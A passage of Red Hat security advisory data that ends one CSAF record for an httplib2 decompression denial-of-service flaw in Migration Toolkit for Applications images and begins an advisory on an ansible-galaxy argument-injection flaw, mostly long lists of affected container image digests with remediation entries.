"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "RHBZ#2498212",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498212"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59939",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59939"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427",
"url": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0",
"url": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3",
"url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3"
}
],
"release_date": "2026-07-08T19:34:05.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "httplib2: httplib2: Denial of Service via unbounded decompression of HTTP response bodies"
}
]
}
RHSA-2026:50340
Vulnerability from csaf_redhat - Published: 2026-08-04 18:38 - Updated: 2026-08-05 02:30A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role's meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
